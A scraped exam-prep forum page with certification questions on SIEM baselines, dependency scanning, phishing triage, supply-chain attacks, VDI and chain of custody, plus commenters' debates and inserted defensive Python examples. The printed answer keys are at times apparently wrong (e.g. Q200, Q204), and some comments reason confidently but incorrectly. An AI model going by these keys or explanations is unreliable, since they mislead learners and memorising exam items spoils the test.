Likely determined by when and where the logins are occurring and if it's different from the baseline. This should hopefully reduce the amount of
alerts occurring.
upvoted 4 times
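The learning-mode idea in the comment above (learn what is normal per user, then alert only on deviation) can be shown end to end on login events. The following is an added example, not the page's code nor any SIEM vendor's logic: it builds a per-user baseline of countries and login hours from a learning window, scores every later login against that baseline, and reports what would be suppressed as normal versus what would surface as an alert. The event tuple format, the users, timestamps and countries are all constructed for the example, and the one-hour tolerance is an assumed tuning knob.

```python
"""Build a per-user login baseline from a learning window, then score later
logins against it so that only deviations raise alerts.

Added example for the SIEM learning-mode discussion; the event format and
all events below are constructed, and HOUR_TOLERANCE is an assumed setting.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed authentication events: (user, ISO timestamp, source country, result).
EVENTS: List[Tuple[str, str, str, str]] = [
    # learning window: alice logs in around 08:00 from US, bob around 13:00-14:00 from DE
    ("alice", "2023-01-02T08:05:00", "US", "success"),
    ("alice", "2023-01-03T08:12:00", "US", "success"),
    ("alice", "2023-01-04T08:58:00", "US", "success"),
    ("alice", "2023-01-05T07:55:00", "US", "failure"),  # failures never train the baseline
    ("alice", "2023-01-05T08:01:00", "US", "success"),
    ("bob",   "2023-01-02T13:30:00", "DE", "success"),
    ("bob",   "2023-01-04T14:10:00", "DE", "success"),
    # after the cutoff: the logins the analyst is being alerted on
    ("alice", "2023-01-09T08:10:00", "US", "success"),   # normal
    ("alice", "2023-01-09T03:12:00", "RU", "success"),   # new country and odd hour
    ("bob",   "2023-01-09T13:45:00", "DE", "success"),   # normal
    ("bob",   "2023-01-10T15:05:00", "DE", "success"),   # one hour outside usual, tolerated
    ("carol", "2023-01-10T09:00:00", "US", "success"),   # never seen during learning
]

CUTOFF = datetime.fromisoformat("2023-01-08T00:00:00")  # end of the learning window
HOUR_TOLERANCE = 1  # hours either side of an observed login hour still count as usual


def build_baseline(events, cutoff) -> Dict[str, Dict[str, Set]]:
    """Learning mode: per user, record the countries and hours of successful
    logins before the cutoff. Failed attempts are excluded so an attacker's
    noise cannot train itself into the baseline."""
    baseline = defaultdict(lambda: {"countries": set(), "hours": set()})
    for user, ts, country, result in events:
        when = datetime.fromisoformat(ts)
        if when >= cutoff or result != "success":
            continue
        baseline[user]["countries"].add(country)
        baseline[user]["hours"].add(when.hour)
    return dict(baseline)


def _hour_is_usual(hour: int, usual: Set[int]) -> bool:
    # circular distance so that 23:00 and 00:00 are one hour apart
    return any(min(abs(hour - h), 24 - abs(hour - h)) <= HOUR_TOLERANCE for h in usual)


def score(event, baseline) -> List[str]:
    """Return the reasons an event deviates from its user's baseline; an empty
    list means it matches normal operations and produces no alert."""
    user, ts, country, _result = event
    profile = baseline.get(user)
    if profile is None:
        return ["no_baseline"]
    reasons = []
    if country not in profile["countries"]:
        reasons.append("new_country")
    if not _hour_is_usual(datetime.fromisoformat(ts).hour, profile["hours"]):
        reasons.append("unusual_hour")
    return reasons


def triage(events, cutoff):
    """Score every post-cutoff event; return (alerts, number suppressed as normal)."""
    baseline = build_baseline(events, cutoff)
    alerts, suppressed = [], 0
    for ev in events:
        if datetime.fromisoformat(ev[1]) < cutoff:
            continue
        reasons = score(ev, baseline)
        if reasons:
            alerts.append((ev[0], ev[1], ev[2], reasons))
        else:
            suppressed += 1
    return alerts, suppressed


if __name__ == "__main__":
    alerts, suppressed = triage(EVENTS, CUTOFF)
    print(f"{suppressed} logins matched the baseline and were suppressed")
    for user, ts, country, reasons in alerts:
        print(f"ALERT {user} {ts} from {country}: {', '.join(reasons)}")
```

Of the five post-cutoff logins, three are suppressed and two alert: alice's 03:12 login from a country never seen for her, and carol, who has no baseline at all and so cannot be judged normal. That is the noise reduction the question is after, and the "no_baseline" case is the caveat: a learning window only covers users it has seen, so new accounts need a separate policy rather than silent suppression.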

kennyleung0514 3 months, 3 weeks ago
Selected Answer: D
The model answer makes no sense.
It should be D; to set a baseline, using the behavior is the best way to go.
upvoted 1 times

usam2021 4 months, 3 weeks ago
This might help answer why is D: https://www.ibm.com/topics/siem (AI learning and behavior analysis)
upvoted 2 times


Question #200 Topic 1

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is
released into production?

A. Employ different techniques for server- and client-side validations

B. Use a different version control system for third-party libraries

C. Implement a vulnerability scan to assess dependencies earlier on SDLC

D. Increase the number of penetration tests before software release

Correct Answer: D

Community vote distribution


C (91%) 9%

stoneface Highly Voted 5 months ago
Selected Answer: C
Going with C
upvoted 13 times

J_Ark1 2 months, 3 weeks ago
What is SDLC, again?
upvoted 2 times

Sandon 2 months, 1 week ago
Software development life cycle
upvoted 1 times

babyzilla 2 months, 2 weeks ago
Systems Development Cycle
upvoted 1 times

babyzilla 2 months, 2 weeks ago
Systems Development Life* Cycle
upvoted 2 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: C
C. Implement a vulnerability scan to assess dependencies earlier on SDLC

It is a best practice to assess security flaws in software dependencies as early as possible in the software development life cycle (SDLC) to
minimize the risk of vulnerabilities being exploited in production. One effective way to do this is by implementing a vulnerability scan to assess
dependencies, which are third-party libraries embedded in the software. A vulnerability scan can detect security flaws and vulnerabilities in the
libraries used by the software and provide recommendations for remediation. By implementing a vulnerability scan early in the SDLC, the
company can proactively address security issues before they become a problem in production.
upvoted 2 times
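The dependency scan the comment above describes is, at its core, a comparison of each pinned third-party library against an advisory feed, run as a build step so the release is blocked before production. The following is an added example, not the page's code and not any real scanner's logic: it parses a requirements file, normalizes package names, compares versions numerically against each advisory's affected range, and returns a release gate decision. The requirements file, package names, version ranges and advisory IDs are all constructed for the example (the IDs are placeholders, not real CVE numbers), only exact `==` pins are handled, and the set of blocking severities is an assumed policy choice.

```python
"""Match pinned dependencies against an advisory list so vulnerable
third-party libraries are caught in the build, before release.

Added example for the Q200 discussion; not the page's code and not a real
scanner. Requirements, package names and advisories are constructed, the
advisory IDs are placeholders, and only exact '==' pins are handled.
"""
from typing import Dict, List, Tuple

# Constructed requirements.txt contents (pinned versions only).
SAMPLE_REQUIREMENTS = """\
# constructed sample, not a real project
examplelib==1.3.0
safelib==2.0.1
other-lib==0.9.0   # inline comment
legacy_parser==3.10.2
"""

# Constructed advisory feed: a version is affected when introduced <= v < fixed.
SAMPLE_ADVISORIES = [
    {"id": "EXAMPLE-ADV-0001", "package": "examplelib",
     "introduced": "1.0.0", "fixed": "1.4.2", "severity": "high"},
    {"id": "EXAMPLE-ADV-0002", "package": "other-lib",
     "introduced": "0.1.0", "fixed": "0.9.0", "severity": "medium"},
    {"id": "EXAMPLE-ADV-0003", "package": "legacy-parser",
     "introduced": "3.0.0", "fixed": "3.11.0", "severity": "critical"},
]

BLOCKING_SEVERITIES = {"critical", "high"}  # assumed policy: these fail the build


def normalize_name(name: str) -> str:
    """Case-insensitive name with '-', '_' and '.' treated as equivalent, so
    'legacy_parser' in requirements matches 'legacy-parser' in the feed."""
    return name.lower().replace("_", "-").replace(".", "-")


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '3.10.2' into (3, 10, 2) so comparisons are numeric: as strings
    '3.10.2' < '3.9.0', which would silently miss an affected version."""
    return tuple(int(part) for part in version.split("."))


def parse_requirements(text: str) -> Dict[str, str]:
    """Return {normalized name: pinned version} for each 'name==version' line."""
    pins = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop full-line and inline comments
        if not line or "==" not in line:
            continue
        name, version = (s.strip() for s in line.split("==", 1))
        pins[normalize_name(name)] = version
    return pins


def scan(requirements: str, advisories: List[dict]) -> List[dict]:
    """Return one finding per (pinned dependency, advisory) match."""
    pins = parse_requirements(requirements)
    findings = []
    for adv in advisories:
        pinned = pins.get(normalize_name(adv["package"]))
        if pinned is None:
            continue
        v = parse_version(pinned)
        if parse_version(adv["introduced"]) <= v < parse_version(adv["fixed"]):
            findings.append({"package": adv["package"], "pinned": pinned,
                             "advisory": adv["id"], "severity": adv["severity"],
                             "upgrade_to": adv["fixed"]})
    return findings


def should_block_release(findings: List[dict]) -> bool:
    """CI gate: fail the build when any finding has a blocking severity."""
    return any(f["severity"] in BLOCKING_SEVERITIES for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_REQUIREMENTS, SAMPLE_ADVISORIES)
    for f in results:
        print(f"{f['severity'].upper():8} {f['package']}=={f['pinned']} "
              f"({f['advisory']}) -> upgrade to {f['upgrade_to']}")
    raise SystemExit(1 if should_block_release(results) else 0)
```

On the constructed input two findings come back (examplelib and legacy_parser) and the gate returns True, so the pipeline exits non-zero; other-lib is pinned exactly at the fixed version and is correctly not flagged. The numeric version comparison and the name normalization are the two details that separate a useful scan from a false sense of coverage, since a lexical compare or a raw string match quietly misses affected packages.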

FMMIR 1 month, 3 weeks ago
Selected Answer: C
The most effective way to detect security flaws present on third-party libraries embedded on software before it is released into production is to
implement a vulnerability scan to assess dependencies earlier on the SDLC, or software development life cycle. A vulnerability scan is a type of
security assessment that involves identifying and analyzing potential vulnerabilities in a system or application. By conducting a vulnerability scan
earlier on in the SDLC, the development team can identify any security flaws in the third-party libraries before the software is released into
production. This can help prevent security issues from being introduced into the production environment and ensure that the software is secure
and compliant. Employing different techniques for server- and client-side validations, using a different version control system for third-party
libraries, and increasing the number of penetration tests are not directly related to detecting security flaws in third-party libraries.
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: C
Answer: Implement a vulnerability scan to assess dependencies earlier on SDLC

Implementing vulnerability scans allows for earlier detection and assessment of any potential vulnerabilities, which can then be addressed
accordingly.
upvoted 1 times

zharis 3 months, 1 week ago
Selected Answer: D
Going with D. Penetration tests which actively test security controls exploit vulnerabilities - prove that a vulnerability is high risk by exploiting it to
gain access to data or install backdoors
upvoted 2 times

RonWonkers 4 months, 1 week ago
Selected Answer: C
Gonna go with C
upvoted 1 times

okay123 5 months ago
Selected Answer: C
It's C
upvoted 2 times


Question #201 Topic 1

Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?

A. Job rotation policy

B. NDA

C. AUP

D. Separation of duties policy

Correct Answer: C

Community vote distribution


C (56%) D (31%) 13%

banditring Highly Voted 3 months, 3 weeks ago
This is what happens when CompTIA runs out of questions to make up and then they start sounding stupid -_-
upvoted 14 times

mark9999 3 months, 1 week ago
Very true. They are so hell bent on changing loads of questions so that the dumps don't work that they make up a lot of ambiguous drivel.
There are only so many ways to ask the same concepts.
upvoted 1 times

Gino_Slim 3 months, 1 week ago
This is the true answer
upvoted 1 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: D
D. Separation of duties policy is the control that prevents an employee from seeing a colleague who is visiting an inappropriate website.
Separation of duties policy is a management principle in which tasks and responsibilities are divided among multiple individuals to reduce the risk
of fraud or misuse of resources. By implementing this policy, different employees will have different responsibilities, making it difficult for a single
person to access or view sensitive information or engage in malicious activities.
upvoted 1 times

ZDW 1 week, 4 days ago
Selected Answer: C
It would be AUP because having job rotation, separation of duties, or signing an NDA would not prevent any possible colleague from seeing you on an inappropriate website. However, an AUP can require things such as a screen cover that has the potential to prevent others from seeing what you are doing.
upvoted 1 times

diegomatheus00 2 weeks, 1 day ago
What a terrible question
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: D
A separation of duties policy would prevent an employee from seeing a colleague who is visiting an inappropriate website. Separation of duties is
a security control that ensures that no single individual has complete control over a particular process or activity. This can help prevent fraud and
abuse by requiring multiple individuals to be involved in different stages of a process. In the context of preventing an employee from seeing a
colleague visiting an inappropriate website, a separation of duties policy could involve implementing different roles or responsibilities for different
individuals. For example, one individual might be responsible for monitoring network traffic, while another individual might be responsible for
responding to incidents. This would prevent any single individual from being able to view the inappropriate website and potentially escalate the
situation. Job rotation, NDA, and AUP are not directly relevant to preventing an employee from seeing a colleague visiting an inappropriate
website.
upvoted 1 times

Sandon 1 month, 3 weeks ago
Meh, probably not
upvoted 1 times

Jimbobilly 1 month, 4 weeks ago
Good grief, what kind of a question is that?
upvoted 1 times

zaac22 2 months, 2 weeks ago
C, my explanation: the user could use his device to trace/monitor colleagues' activities. The AUP should prevent such improper use of the device
upvoted 1 times
carpathia 2 months, 3 weeks ago
Selected Answer: A
Probably job rotation, because you can't see what the other is doing as you are meant to be separated. Well, it doesn't mean exactly that separation of duties implies you are 1 km away from each other, but I don't know. The other ones do not apply to the situation, at least from what I see in CompTIA books. God save us!
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: C
Answer: AUP

I don't understand the question so I'll assume the question is....

"Which of the following prevents an employee from visiting an inappropriate website"

.....which would somewhat make more sense. An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees
must follow in regard to the company's network, software, internet connection and devices. The employee shouldn't access the inappropriate
website as it would go against proper use of the company network.

================
Helpful Info I Guess

NDA (Non-disclosure agreement) - a binding contract between two or more parties that prevents sensitive information from being shared with
others.

Separation of Duty - refers to the principle that no user should be given enough privileges to misuse the system on their own.

Job rotation - A concept that has employees rotate through different jobs to learn the procedures and processes in each. From a security
perspective, job rotation helps to prevent or expose dangerous shortcuts or even fraudulent activity.
upvoted 3 times

Sir_Learnalot 2 months, 3 weeks ago
Sometimes I get the feeling CompTIA uses a random sentence generator for their questions -.-
upvoted 4 times

lordguck 3 months ago
D. It's the only answer which leads to "prevent" by proxy, as the IT grunts must do the work to make it a reality. B and C are just pieces of paper, deterrent controls at best.
upvoted 1 times

G4ct756 3 months, 1 week ago
Selected Answer: D
D? The question asked which choice prevents someone from seeing a colleague who is visiting an inappropriate website.
For B, job rotation policy, someone might take over the desktop and view browser history.
Not NDA, since it is an agreement for viewing sensitive data.
Not AUP, a usage agreement between user and company, which the colleague violated.
Left with D, separation of duties: the employee can't see the colleague's activity.
upvoted 3 times

Holysurprise 3 months, 2 weeks ago
This is perhaps the most poorly worded question I have come across. From how it reads it sounds like what stops one user from looking at or
talking to another user while they are accessing said inappropriate site.
upvoted 4 times

  kennyleung0514 3 months, 3 weeks ago


I don't understand what the question is asking about.
How to prevent a person from looking at another person's screen?
Hmm, I think each of them should have a dedicated room with a door lock?
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


lots of laughter
upvoted 1 times

  andrizo 3 months, 3 weeks ago


No, not shoulder surfing, inappropriate content.
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Terrible question smh
upvoted 3 times

  deeden 4 months, 1 week ago


Wait a minute, I'm confused. So by implementing AUP, we're preventing Edward from seeing Edmund, because Edmund is visiting porn sites?


Or maybe...
Which of the following prevents an employee from visiting an inappropriate website?
upvoted 1 times
  lucasvs_ 4 months, 2 weeks ago
Selected Answer: C
In terms of enforcing an AUP in cyber security, internet management software ensures that high-risk websites are not visited on managed
computers. Software for monitoring employee computer use will provide you with tangible insights into the effectiveness of your acceptable use
policies.
upvoted 1 times


Question #202 Topic 1

A user reports falling for a phishing email to an analyst. Which of the following system logs would the analyst check FIRST?

A. DNS

B. Message gateway

C. Network

D. Authentication

Correct Answer: A

Community vote distribution


A (35%) B (33%) D (28%) 4%

  Gino_Slim Highly Voted  3 months, 1 week ago


This is also a dumb question
upvoted 17 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
We want to see DNS logs to see where the user was taken
upvoted 14 times

  db97 4 months, 1 week ago


But you're assuming that he clicked on a link and the question does not specify that
upvoted 4 times

  Sandon 2 months, 4 weeks ago


It does specify that
upvoted 1 times

  RonWonkers 4 months, 1 week ago


The user reports falling for the phishing mail
upvoted 6 times

  i_bird 4 months, 1 week ago


Any elaboration will be appreciated.
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: B
The analyst would check the message gateway logs FIRST. The message gateway logs provide information on all incoming and outgoing email
traffic. This log will contain information on the phishing email the user reported falling for, including the time and date the email was received, the
sender, and the recipient. This information can be used to verify the user's claim, track the source of the phishing email, and prevent similar
attacks in the future.
upvoted 1 times

  Ranaer 4 days, 5 hours ago


Selected Answer: D
I was initially leaning towards DNS, but not all phishing emails use links. Some use harmful attachments, such as macro-embedded files or files
with double extensions to trick users into clicking them.
When we take into account that there are other ways of falling for a phishing email, DNS doesn't make much sense anymore.
Message gateway will give us the information where the email is from. I don't believe we need that.
Network logs might show us if there is any abnormal traffic, but that wouldn't be useful if the infected machine is only one and it's not beaconing or
trying to spread through the network.
So we are left with Authentication. It doesn't sound too convincing either, but there might be privilege escalation attempts going on, which we should
be able to see within the auth logs.

The explanation is flimsy, but the question is honestly awful so....


upvoted 2 times

  Ranaer 4 days, 5 hours ago


Upon some further examination, I would like to retract my explanation for Message gateway. The message gateway could provide us with
information on whether anyone else within the organization has received the same email. I don't think that is much help, but it still gives a bit more to that
answer.
I still think the reasonable answers are DNS or Authentication. So it's pretty much a coin flip.
upvoted 1 times


  ZDW 1 week, 4 days ago


Selected Answer: B
Nothing in this question says what information was given away or if a link was clicked. So you wouldn't just go blindly searching DNS or
authentication logs; you would need to see the email first, what it is asking for, who all it may have gone to, etc.
upvoted 1 times

  rumblerally 3 weeks, 1 day ago


Imagine a situation where a user falls for a phishing email and has given their credentials away to a bad actor. PRIORITY NUMBER 1 IS TO SEE
IF SOMEONE IS CURRENTLY INSIDE THE ACCOUNT. That is the most crucial part of this entire question. Who gives a shit about who did it... we
need to know if someone actually breached the account! They could be in the process of stealing information, etc.
upvoted 3 times

  rumblerally 3 weeks, 1 day ago


The answer is authentication logs. Don't overthink it. I have worked in environments where this exact situation has occurred and auth logs are
the number 1 priority. Everything else is dealt with later when an investigation occurs and time is no longer as critical.
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: A
Leaning towards DNS
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


Selected Answer: A
Definitely DNS
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The analyst would check the authentication logs first.
Authentication logs typically record information about login attempts, such as the time, date, and outcome of the attempt, as well as the
username and IP address of the user who attempted to log in. These logs can help the analyst determine whether the user's account was
accessed without their permission, and can provide important information for investigating the phishing incident.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Not sure about this. I think the answer is B:

The analyst should check the message gateway logs first. A message gateway is a system that processes and routes email messages, and
the message gateway logs would contain information about the phishing email that the user received. The logs would typically include details
such as the sender and recipient of the email, the time it was sent, and any actions that were taken by the message gateway (such as marking
the email as spam or quarantining it). This information can help the analyst understand how the user received the phishing email and take
appropriate action to prevent similar incidents in the future.
upvoted 2 times

  Blueteam 2 months, 1 week ago


Another bad question.
The first thing that should be checked is the email. What kind of phishing is this?
Did it ask the user to click on a link? Sign in to a website? Call a phone number? Share credentials?
The closest answer is checking the message gateway.
upvoted 2 times

  y3t1 2 months, 1 week ago


I think D. I'm saying this because the first thing you should check is if the user's credentials have been breached allowing the attacker through to
whatever the user has access to. Could include SSO VPN, RDS, etc. Change the user's credentials, and then proceed to confirm how the
message got through, what the message was, etc.
upvoted 2 times

  JSOG 2 months, 2 weeks ago


Selected Answer: C
From this site, the answer is Network. May be right or not; judge for yourself: https://www.dumpsmate.com/sy0-601-comptia-securityp-exam-2021-question.html
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
For me this question does not give enough information for the case. Depending on what kind of phishing this was, it could have different impacts.
Was it a credential harvesting attack? Go and check the authentication logs. Was it a download link for something like malware? You should
check network and DNS logs to see if any C2 is happening, and to understand the origin of the attack and maybe prevent further attacks you
should also check the message gateway logs... Authentication logs are the most critical to me, as stolen credentials and a resulting malicious login
would be a big red flag. But I'm happy to hear other opinions on this.
upvoted 3 times

  Knowledge33 3 months ago


Selected Answer: B
DNS is false. In fact, the user directly reported the SPAM. He didn't click on anything. It means that, as he didn't try to access a malicious website, no
DNS query was made.

An Email Gateway, or a Secure Email Gateway (SEG), is a mail server that analyzes an organization’s incoming and outgoing emails before they
reach the internal mail server. All emails pass through this Email Gateway and are checked for potential security threats. An Email Gateway,
hence, acts as a firewall for emails.

https://www.educative.io/answers/what-is-an-email-gateway
upvoted 4 times

  Sandon 2 months, 4 weeks ago


"falling for a phishing email" = he clicked it
upvoted 4 times

  zharis 3 months, 1 week ago


Selected Answer: C
What about Network as the answer?
upvoted 1 times

  Tomtom11 3 months, 1 week ago


DNS logs, when enabled, can contain a record for every query and response. This can be a treasure trove of information for an investigator because
it can reveal malware calling out to its command-and-control server, or data transfers to non-company locations. Analysis of DNS logs can show IP
addresses and domain names that your systems should be communicating with as well as ones they shouldn't be communicating with. In cases where
an attacker or malware is doing the communication, these communication channels may be next to invisible on the network, but the DNS system, as
part of the network architecture, can log the activity. This is one of the reasons why DNS logs are some of the most valuable logs to import into a
SIEM system.
upvoted 3 times

  MarciaL 3 months, 2 weeks ago


C. Network
upvoted 1 times
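The thread above argues for three different log sources, and in practice an analyst pulls all three in order. The script below is an added example that is not part of the original page or the exam material: it walks one phishing report through constructed key=value log lines (the field names, hosts, users and addresses are assumptions, not any real product's format). The message gateway log scopes the campaign and shows who else actually received it, the DNS log shows which hosts resolved the lure domain after delivery, and the authentication log shows whether the reporter's account was then used from a source with no prior history, which is the credential-compromise signal several posters are pointing at.

```python
"""Triage of a reported phishing email over three log sources.

Added example, not from the page or the exam. The key=value log format, the
hosts, users and addresses below are constructed; real gateway, resolver and
identity-provider logs use their own formats."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample logs. Timestamps are UTC (ISO 8601).
GATEWAY_LOG = """\
ts=2023-02-04T08:01:10Z msg_id=m1 from=billing@invoice-portal.example to=alice@corp.example subject="Invoice overdue" url=https://login.invoice-portal.example/sso action=delivered
ts=2023-02-04T08:01:12Z msg_id=m2 from=billing@invoice-portal.example to=bob@corp.example subject="Invoice overdue" url=https://login.invoice-portal.example/sso action=delivered
ts=2023-02-04T08:01:15Z msg_id=m3 from=billing@invoice-portal.example to=carol@corp.example subject="Invoice overdue" url=https://login.invoice-portal.example/sso action=quarantined
ts=2023-02-04T08:30:00Z msg_id=m4 from=hr@corp.example to=alice@corp.example subject="Payslip" url=https://hr.corp.example/pay action=delivered
"""
DNS_LOG = """\
ts=2023-02-04T08:05:40Z client=10.1.1.20 query=login.invoice-portal.example type=A
ts=2023-02-04T08:06:02Z client=10.1.1.20 query=www.corp.example type=A
ts=2023-02-04T08:40:11Z client=10.1.1.35 query=login.invoice-portal.example type=A
"""
AUTH_LOG = """\
ts=2023-02-04T07:55:00Z user=alice src_ip=10.1.1.20 result=success
ts=2023-02-04T08:20:30Z user=alice src_ip=203.0.113.77 result=failure
ts=2023-02-04T08:20:45Z user=alice src_ip=203.0.113.77 result=success
ts=2023-02-04T09:00:00Z user=bob src_ip=10.1.1.35 result=success
"""

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(log):
    """Turn each key=value line into a dict, unquoting values and parsing ts."""
    rows = []
    for line in log.strip().splitlines():
        row = {k: v.strip('"') for k, v in KV.findall(line)}
        row["ts"] = datetime.strptime(row["ts"], "%Y-%m-%dT%H:%M:%SZ")
        rows.append(row)
    return rows


def triage(reporter, msg_id, gateway=GATEWAY_LOG, dns=DNS_LOG, auth=AUTH_LOG,
           window=timedelta(hours=2)):
    """Walk one report through gateway, DNS and auth logs; return the findings."""
    gw, dq, au = parse(gateway), parse(dns), parse(auth)
    reported = next(r for r in gw if r["msg_id"] == msg_id and r["to"] == reporter)
    sender, t0 = reported["from"], reported["ts"]
    lure = urlparse(reported["url"]).hostname

    # Message gateway: scope the campaign (same sender, same lure domain) and
    # see who else actually received it rather than having it quarantined.
    campaign = [r for r in gw if r["from"] == sender and urlparse(r["url"]).hostname == lure]
    delivered_to = sorted(r["to"] for r in campaign if r["action"] == "delivered")

    # DNS: hosts that resolved the lure domain after delivery are the ones that
    # (probably) clicked, including recipients who never reported anything.
    resolved_by = sorted({r["client"] for r in dq if r["query"] == lure and r["ts"] >= t0})

    # Authentication: a successful login for the reporter from a source with no
    # history before the email, inside the window, suggests harvested credentials.
    user = reporter.split("@")[0]
    known = {r["src_ip"] for r in au if r["user"] == user and r["ts"] < t0}
    new_logins = [r for r in au
                  if r["user"] == user and t0 <= r["ts"] <= t0 + window
                  and r["result"] == "success" and r["src_ip"] not in known]

    return {
        "lure_domain": lure,
        "delivered_to": delivered_to,
        "resolved_by": resolved_by,
        "new_source_logins": [(r["src_ip"], r["ts"].isoformat()) for r in new_logins],
        "credential_compromise_likely": bool(new_logins),
    }


if __name__ == "__main__":
    print(triage("alice@corp.example", "m1"))
```

Run as-is it reports the lure domain, that alice and bob received the mail while carol's copy was quarantined, that two internal hosts resolved the lure, and a successful login for alice from 203.0.113.77 twenty minutes after delivery. The order of checks mirrors the containment priority: the auth finding is what you act on first (reset, revoke sessions), the DNS finding tells you who else to contact, and the gateway finding is what lets you purge the rest of the campaign.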


Question #203 Topic 1

An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being
exploited?

A. Social media

B. Cloud

C. Supply chain

D. Social Engineering

Correct Answer: C

Community vote distribution


C (86%) 14%

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The attacker is exploiting the supply chain vector. The supply chain refers to the series of processes and organizations involved in the production,
distribution, and delivery of goods and services. By infiltrating third-party software vendors, the attacker is attempting to gain access to the
supply chain and compromise the software that is used by the organization. This can allow the attacker to launch attacks, steal sensitive data, or
disrupt operations by inserting malicious code into the software. Social media, cloud, and social engineering are not directly related to the supply
chain and would not be effective for infiltrating third-party software vendors.
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: D
Going with D too.
upvoted 1 times

  Sandon 1 week, 3 days ago


That ain't it buddy
upvoted 1 times

  MarciaL 3 months, 2 weeks ago


I'm going with D. Social Engineering
upvoted 3 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
C is correct
upvoted 1 times

  serginljr 4 months, 3 weeks ago


Selected Answer: C
C is the correct answer.
upvoted 4 times

  gen2dee 4 months, 2 weeks ago


Explain, please.
upvoted 1 times

  i_bird 4 months, 1 week ago


Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to access source codes,
build processes, or update mechanisms by infecting legitimate apps to distribute malware.

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjcye66gKv6AhXWjIkEHZ2BDAMQFnoECAUQAw&url=https%3A%2F%2Flearn.microsoft.com%2Fen-us%2Fmicrosoft-365%2Fsecurity%2Fintelligence%2Fsupply-chain-malware%23%3A~%3Atext%3DSupply%2520chain%2520attacks%2520are%2520an%2Clegitimate%2520apps%2520to%2520distribute%2520malware.&usg=AOvVaw3RhD4fF-pUIEOJD0fGVjn7
upvoted 5 times


Question #204 Topic 1

An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use
their personal computers, or they will be provided organization assets. Either way, no data or applications will be installed locally on any user
systems. Which of the following mobile solutions would accomplish these goals?

A. VDI

B. MDM

C. COPE

D. UTM

Correct Answer: B

Community vote distribution


A (93%) 7%

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
MDM would require something to be installed. VDI, virtual desktop infrastructure, would allow employees to run apps on the company
network without installing locally.
upvoted 19 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
A. VDI (Virtual Desktop Infrastructure) would accomplish these goals. VDI provides remote workers with access to a virtual desktop that is hosted
on the organization's servers. The virtual desktop is accessed over the internet, and the user interacts with it as if it were installed locally on their
computer. No data or applications are installed on the user's system, as they are all hosted on the organization's servers. The user's computer
simply provides a display and input interface. This solution meets the requirement that no data or applications be installed locally on the user's
system.
upvoted 1 times

  RvR109 1 month ago


Selected Answer: A
"Remote workers" and "no data or applications will be installed locally" definitely leans toward a VDI (Virtual Desktop Infrastructure).
upvoted 1 times

  EubertT 2 months, 3 weeks ago


Please read the last sentence: "Which of the following mobile solutions would accomplish these goals?" So, Mobile Device Management or MDM.
This management can be very important if users are bringing their own devices into the workplace and then we're putting sensitive company
information on the user's own device.
upvoted 2 times

  Sandon 1 week, 2 days ago


That's not what MDM does
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
VDI stands no chance. Mobile device management, which processes and supports technologies for tracking, controlling and securing the
organization's mobile infrastructure.
upvoted 2 times

  Sandon 1 week, 2 days ago


You couldn't be more wrong
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


The hint is the mobile solutions... so MDM
upvoted 1 times

  Sandon 1 week, 2 days ago


Negative, Ghostrider.
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


"Either way, no data or applications will be installed locally on any user systems" = VDI
upvoted 1 times

  VendorPTS 4 months ago


Selected Answer: A
- remote workers the ability to use applications hosted inside the corporate network
- allowed to use their personal computers, or they will be provided organization assets
- no data or applications will be installed locally on any user systems
- Which mobile solutions would accomplish these goals?

None, at least on their own. Of the options available, it seems like it has to be VDI.
upvoted 2 times

  Dface 4 months, 1 week ago


Key to this question, "Which of the following mobile solutions would accomplish these goals?" MDM is correct
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: A
100% VDI
upvoted 1 times

  Strykar 4 months, 1 week ago


Selected Answer: A
Example: Remote Desktop virtual apps.
upvoted 1 times

  Danalyst 4 months, 3 weeks ago


Selected Answer: A
VDI is used in reality. Could be COPE, but that wouldn't account for avoiding installation on private devices.
upvoted 2 times


Question #205 Topic 1

Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?

A. Chain of custody

B. Legal hold

C. Event log

D. Artifacts

Correct Answer: A

Community vote distribution


A (88%) 13%

  serginljr Highly Voted  4 months, 3 weeks ago


Selected Answer: A
A is correct
upvoted 5 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: A
Answer: Chain of custody

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence—such
as cell phone logs—were collected, handled, analyzed, or otherwise controlled during an investigation.
upvoted 2 times

  RonWonkers 4 months, 1 week ago


